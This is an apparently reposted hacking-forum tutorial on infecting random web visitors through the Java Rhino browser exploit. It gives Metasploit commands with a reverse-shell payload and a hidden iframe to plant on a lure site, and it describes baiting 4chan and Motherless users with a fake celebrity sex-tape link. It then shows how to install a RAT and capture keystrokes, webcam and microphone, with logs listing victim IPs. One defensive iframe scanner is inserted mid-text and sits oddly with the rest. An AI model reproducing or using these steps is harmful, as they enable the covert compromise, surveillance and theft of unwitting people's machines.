[TUT] Java Rhino Exploit Tutorial

Introduction

Ok, the Java drive-by is dead. Simply put, it's an ineffective way to spread your RATs/loggers etc., but a lot of you still insist on cluttering this forum up trying to get Java drive-bys to work. I'm writing this tutorial because there is a better solution, the Java_Rhino exploit. The Java_Rhino exploit is a cross-platform, cross-browser zero-day vulnerability that can be used to exploit remote machines. This tutorial will teach you how to set up the Java Rhino exploit and some of the cool things you can do with the Meterpreter payload once your targets have been exploited.

What You Need Before Your Start

A hosting account from x10hosting (free website host) -> http://x10hosting.com/
Download and install Metasploit -> http://metasploit.com/
You need to know your public IP address -> http://www.whatsmyip.org/
If you have a router you'll need to port-forward ports 1337 and 4444 to your local machine.

Metasploit
Ok, a lot of you were having issues with Metasploit. You need to install Metasploit, then run ./msfupdate.exe to update the exploit database to include the Java Rhino exploit. Then open msfconsole and run “reload_all” for the Java Rhino exploit to become available.

What You Need To Understand

In this tutorial you will set up a small web server on your local machine on port 1337 that, when connected to, will invisibly launch a malicious Java applet and exploit the slave. Upon exploitation the slave will connect back to your machine on port 4444, giving you access to the entire machine with the privileges of the user that has been exploited. This will not work if you're behind a router and have not forwarded these ports to your local machine. If you haven't done this yet, stop reading, forward your ports (or connect directly to the internet) and open these ports on your firewall (if you're using Windows).

Initial Set Up

Ok, to keep this attack invisible I suggest making a mirror site and hosting it on the x10hosting account you set up in the “What You Need” section of this tutorial. What the website has on it I don't really give a shit. I've been using a Facebook knockoff site boasting a Selena Gomez sex tape; porn-style sites work well for easy victims, as I will explain later. So go and set up a site on your x10hosting account, note down your domain name and come back, but keep your cPanel open, as we will be adding one more piece of code to your site's homepage.

Spoiler of my dummy website – WARNING ADULT


Metasploit Setup

Ok, now we need to set up the Java_Rhino exploit server. So fire up your Metasploit console and enter the following commands.

Tell Metasploit to use the Java Rhino exploit

Code:
use exploit/multi/browser/java_rhino


Set Metasploit to run the server on port 1337

Code:
set SRVPORT 1337


Set the URL of the page that will be doing the exploiting to something more memorable

Code:
set URIPATH exploit


Use a reverse TCP Meterpreter payload so we can have fun with the slave

Code:
set PAYLOAD java/meterpreter/reverse_tcp


Set the connect-back payload to connect back to your public IP

Code:
set LHOST {PUT YOUR PUBLIC IP HERE}


Now run the configuration

Code:
exploit


Here is a sample output of what you should see

Code:
msf > use exploit/multi/browser/java_rhino
msf  exploit(java_rhino) > set SRVPORT 1337
SRVPORT => 1337
msf  exploit(java_rhino) > set URIPATH exploit
URIPATH => exploit
msf  exploit(java_rhino) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf  exploit(java_rhino) > set LHOST XXX.XXX.XXX.XXX
LHOST => XXX.XXX.XXX.XXX
msf  exploit(java_rhino) > exploit
[*] Exploit running as background job.

[-] Handler failed to bind to XXX.XXX.XXX.XXX:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Using URL: http://0.0.0.0:1337/exploit
[*]  Local IP: http://192.168.2.2:1337/exploit
[*] Server started.
msf  exploit(java_rhino) >


Ok, now your exploit server is listening on port 1337. You just need to get people to connect to it. So edit the following piece of code and put your public IP address in it:

Code:
<iframe src="http://[YOURIPHERE]:1337/exploit" width=0 height=0 border=0 size=0></iframe>


So you should end up with something like this:

Code:
<iframe src="http://123.123.123.123:1337/exploit" width=0 height=0 border=0 size=0></iframe>


Copy this into the HTML of the dummy website you created on your x10hosting account. Now whenever someone views your dummy website, the iframe will force their browser to invisibly connect to your exploit server and Metasploit will run the Java_Rhino exploit against their browser. Brilliant.
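As an added defensive check (not code from the original post), here is a small Python scanner that flags the kind of zero-size, off-site iframe described above when reviewing a site's HTML; the sample page, its IP address and port are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a normal embed next to the kind of zero-size
# iframe the tutorial injects into a dummy site. The IP and port are
# placeholders, not real infrastructure.
SAMPLE_HTML = """
<html><body>
<h1>Welcome</h1>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<iframe src="http://123.123.123.123:1337/exploit" width=0 height=0 border=0 size=0></iframe>
</body></html>
"""

class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> tag in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})

def _is_zero(value):
    """True if a width/height value is zero ("0", "0px", "0%")."""
    digits = value.strip().rstrip("px%").strip()
    return digits.isdigit() and int(digits) == 0

def find_suspicious_iframes(html, site_host):
    """Return the src of each iframe that is invisible (zero-sized or hidden
    via CSS) and points off-site or at a non-standard port."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        if not src:
            continue
        style = attrs.get("style", "").replace(" ", "").lower()
        hidden = (_is_zero(attrs.get("width", "")) or _is_zero(attrs.get("height", ""))
                  or "display:none" in style or "visibility:hidden" in style)
        url = urlparse(src)
        off_site = bool(url.hostname) and url.hostname != site_host
        odd_port = url.port not in (None, 80, 443)
        if hidden and (off_site or odd_port):
            findings.append(src)
    return findings

if __name__ == "__main__":
    for src in find_suspicious_iframes(SAMPLE_HTML, "example.com"):
        print("hidden off-site iframe:", src)
```

Run it over a saved copy of a page you administer; a hit means a hidden frame is pulling content from a host you did not put there.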

Getting The Clicks

Ok, this is where you need to do the leg work, and why I recommended using an adult-themed dummy website in order to get clicks.

My two personal favourites that I love to farm with the Java_Rhino exploit are 4chan.org and Motherless.com.

Go to those sites, and in the Motherless boards post a picture of a hot chick, then post a comment about a sexy video on your dummy website and post the link for them to click on. This will get you about 30 minutes of traffic before it's either removed or pushed to the bottom of the boards.

Do the same with the 4chan.org adult section; you can copy and paste the post you used on Motherless.com, but make sure you upload a picture too to catch people's attention. Make the post short and to the point so the user reads it and clicks the link. I have been using this:

Code:
"Finally someone has found a Selena Gomez sex tape - this is the sexiest thing i have ever seen! -> http://link to my dummy site.com"


Along with one of those photoshopped pictures of a naked Selena Gomez that Google just loves to turn up. In doing this you will get about 1 hour's worth of traffic at about 10 clicks a minute, which is enough for what we're doing. Remember, for every person that clicks through, their browser will be exploited because of the iframe we put on the dummy website. You can test it yourself: visit your dummy website and Metasploit should give you some output like this:

Code:
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from XXX.XXX.XXX.XXX:42045...
[*] Sending Applet.jar to XXX.XXX.XXX.XXX:42048...


Brilliant, now you need to watch the clicks come rolling in from 4chan and Motherless from all those porn-hungry weirdos. Your screen will fill up with connection attempts quickly and will look like this:

Code:
[*] Sending Applet.jar to 98.20.58.180:50224...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 74.36.201.221:61587...
[*] Sending Applet.jar to 98.20.58.180:50224...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50240...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50241...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50242...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50243...
[*] Sending Applet.jar to 74.36.201.221:61621...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 190.212.80.224:45560...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 190.212.80.224:45560...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 74.36.201.221:61587...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 74.36.201.221:61635...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 69.114.123.235:1200...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 77.224.112.18:3785...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 124.182.236.181:62576...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 80.26.163.72:52602...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 80.26.163.72:52602...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 80.141.166.139:51625...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11063...
[*] Sending Applet.jar to 92.12.201.206:11071...
[*] Sending Applet.jar to 92.12.201.206:11071...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11072...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11073...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11074...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11075...


If you're not getting connections like this, but you do get a connection when you go to your dummy site, it means no one is clicking your link, so you should go back to the boards and post some new, more tempting ones. I have also seen people hack sites and point their iframes at a no-ip to get days' worth of legitimate traffic into their Java Rhino exploit. This is just a quick overview, but the more places you post/spam your dummy site link, the better results you'll have. I posted this on a few forums last night and collected over 100 sessions in 2 hours. Don't be disappointed if you only get a few sessions on your first try; it's like fishing, you have to find the right bait line that works for you.

Leave this running for about 5-10 minutes to get your first sessions. You're looking for lines that look like this:

Code:
[*] Sending stage (28469 bytes) to 80.176.86.190
[*] Meterpreter session 1 opened (192.168.2.2:4444 -> 80.176.86.190:56358) at Sat Dec 24 16:56:17 +0000 2011


This means a session has been created between you and the slave. You can view all the sessions that have been created by issuing the “sessions” command:

Code:
Active sessions
==

  Id  Type  Information    Connection
  --  ----  --    --
  1   meterpreter java/java  akoltowski @ ACLAPTOP  192.168.2.2:4444 -> 80.176.86.190:56358
  2   meterpreter java/java  akoltowski @ ACLAPTOP  192.168.2.2:4444 -> 80.176.86.190:56420


To connect to one of these sessions use the “sessions -i <id>” command. The following example shows me connecting to session number 1:

Code:
sessions -i 1
[*] Starting interaction with 1...

meterpreter >


Using Your Sessions

A Meterpreter session gives you a lot of control over the remote slave. You can snapshot their webcam, spawn a shell, screenshot their computer, log their keystrokes. Here is a full list of all the Meterpreter commands you can use to fuck with your slave. You can get this by issuing the “help” command.

Code:
Core Commands
==

    Command  Description
    --  --
    ?  Help menu
    background    Backgrounds the current session
    bgkill    Kills a background meterpreter script
    bglist    Lists running background scripts
    bgrun  Executes a meterpreter script as a background thread
    channel  Displays information about active channels
    close  Closes a channel
    detach    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit    Terminate the meterpreter session
    help    Help menu
    info    Displays information about a Post module
    interact    Interacts with a channel
    irb  Drop into irb scripting mode
    load    Load one or more meterpreter extensions
    migrate  Migrate the server to another process
    quit    Terminate the meterpreter session
    read    Reads data from a channel
    resource    Run the commands stored in a file
    run  Executes a meterpreter script or Post module
    use  Deprecated alias for 'load'
    write  Writes data to a channel

Stdapi: File system Commands
==

    Command  Description
    --  --
    cat  Read the contents of a file to the screen
    cd    Change directory
    del  Delete the specified file
    download  Download a file or directory
    edit    Edit a file
    getlwd  Print local working directory
    getwd  Print working directory
    lcd  Change local working directory
    lpwd    Print local working directory
    ls    List files
    mkdir  Make directory
    pwd  Print working directory
    rm    Delete the specified file
    rmdir  Remove directory
    search  Search for files
    upload  Upload a file or directory

Stdapi: Networking Commands
==

    Command  Description
    --  --
    ipconfig  Display interfaces
    portfwd  Forward a local port to a remote service
    route  View and modify the routing table

Stdapi: System Commands
==

    Command  Description
    --  --
    clearev  Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute  Execute a command
    getpid  Get the current process identifier
    getprivs  Attempt to enable all privileges available to the current process
    getuid  Get the user that the server is running as
    kill    Terminate a process
    ps    List running processes
    reboot  Reboots the remote computer
    reg  Modify and interact with the remote registry
    rev2self  Calls RevertToSelf() on the remote machine
    shell  Drop into a system command shell
    shutdown  Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    sysinfo  Gets information about the remote system, such as OS

Stdapi: User interface Commands
==

    Command  Description
    --  --
    enumdesktops   List all accessible desktops and window stations
    getdesktop  Get the current meterpreter desktop
    idletime  Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot  Grab a screenshot of the interactive desktop
    setdesktop  Change the meterpreters current desktop
    uictl    Control some of the user interface components

Stdapi: Webcam Commands
==

    Command  Description
    --  --
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam


I know a lot of you are big into RATing and botnets. So here's how to upload and execute your server .exe on the remote host.

First, place your server.exe in the same directory as msfconsole. You can find this directory at any time by issuing the “lpwd” command from inside your Meterpreter session.

Next, change directory on the slave to C:\Temp by issuing the cd command:

Code:
cd C:\Temp


Changing directory to C:\Temp (sometimes lowercase C:\temp) ensures we will have the right privileges to upload and execute our server.exe.

Now upload your server.exe:

Code:
upload server.exe


You will get an output that looks like this:

Code:
meterpreter > upload server.exe
[*] uploading  : server.exe -> server.exe
[*] uploaded   : server.exe -> server.exe


Now that your server.exe is on the remote host, you can check it is there by issuing the “ls” command. Some AVs might delete it, so it's worth checking:

Code:
Listing: C:\Temp
==

Mode    Size  Type  Last modified  Name
----    ----  ----  --  ----
.. output omitted
100776/rwxrwxrw-  0  fil   Sat Nov 19 10:50:28 +0000 2011  1D4F.tmp
100776/rwxrwxrw-  0  fil   Tue Nov 22 19:22:00 +0000 2011  24C0.tmp
40776/rwxrwxrw-   0  dir   Mon Dec 12 14:18:57 +0000 2011  msohtml1
40776/rwxrwxrw-   0  dir   Fri Dec 09 14:39:27 +0000 2011  msohtml
40776/rwxrwxrw-   0  dir   Sat Dec 24 16:58:53 +0000 2011  mozilla-media-cache
40776/rwxrwxrw-   0  dir   Thu Nov 03 18:23:32 +0000 2011  ia64
40776/rwxrwxrw-   0  dir   Thu Nov 03 18:23:32 +0000 2011  server.exe << -- WIN
40776/rwxrwxrw-   0  dir   Thu Nov 03 18:23:32 +0000 2011  i386
40776/rwxrwxrw-   0  dir   Sat Dec 24 17:00:11 +0000 2011  hsperfdata_akoltowski
40776/rwxrwxrw-   0  dir   Sat Dec 24 12:30:20 +0000 2011  WPDNSE
40776/rwxrwxrw-   0  dir   Thu Dec 08 16:05:02 +0000 2011  VBE
..output omitted


If it isn't in \Temp then try uploading it to the user's Documents folder instead, because each user can write to and execute from their home directory.

You can now execute your server.exe by issuing:


Code:
execute -f server.exe -m -H


The flags execute it from memory and hide the process from the slave.

You can then issue the “screenshot” command to screenshot the user's computer to see if their AV detected it:

Code:
meterpreter > screenshot
Screenshot saved to: /home/solaris/hFOnwohk.jpeg


Meterpreter will open the screenshot in a web browser for you to view. As you can see, my slave is watching some sleazy porn video:

Screenshot: [Image: h_FOnwohk.jpg]


As you can see their AV hasn't detected the execution, so our server is now installed on the remote user's machine. Congratulations.

Other Fun Things

To get a CMD shell (useful)

Code:
meterpreter > cd C:\Windows\System32
meterpreter > execute -f cmd.exe -i -H


Log Keystrokes

Code:
meterpreter > keyscan_start

(wait 10 mins)

meterpreter > keyscan_dump
meterpreter > keyscan_stop


Record Microphone

Code:
meterpreter > record_mic
[*] Starting...
[*] Stopped
Audio saved to: /home/solaris/aabHbPGz.wav


Shut down the slave

Code:
meterpreter > shutdown


Show the victim's webcams

Code:
meterpreter > webcam_list


Take a photo from the victim's webcam

Code:
meterpreter > webcam_snap <webcam id>


Get remote system info

Code:
meterpreter > sysinfo


Go back and select another session without killing this one (after “background” you are at the msf prompt, where the “sessions” commands are run)

Code:
meterpreter > background
msf  exploit(java_rhino) > sessions
msf  exploit(java_rhino) > sessions -i <id>


Errors You Will Get

The exploit isn't perfect; you will get errors on certain sessions. Here is a common one:

Code:
[-] Operation failed: 1


You'll get this when issuing a command that is either wrong, unable to execute on the OS, or one you don't have the privileges for. The only way I have found to get round this on some hosts is to change to the C:\Temp directory and try again; if that doesn't work, issue:

Code:
meterpreter > getprivs
meterpreter > ps

(this gives you a list of the running processes on the machine; copy the ID of the srvhosts.exe process)

meterpreter > migrate <the id you just copied>


This will migrate the Meterpreter process into srvhosts.exe, which runs with admin privileges, so it should increase your privilege level. It works about 20% of the time.

1 Comment

    Anon Nimi November 4, 2013 at 2:07 am

    WoowWWWW…….
    Hats Off to you piyush bhalala..!!!

    Excellent work… I was searching for such a tutorial for more than 3 weeks and was frustrated by many sleepless nights…

    Thank you sooo Much for your wonderful work.!!
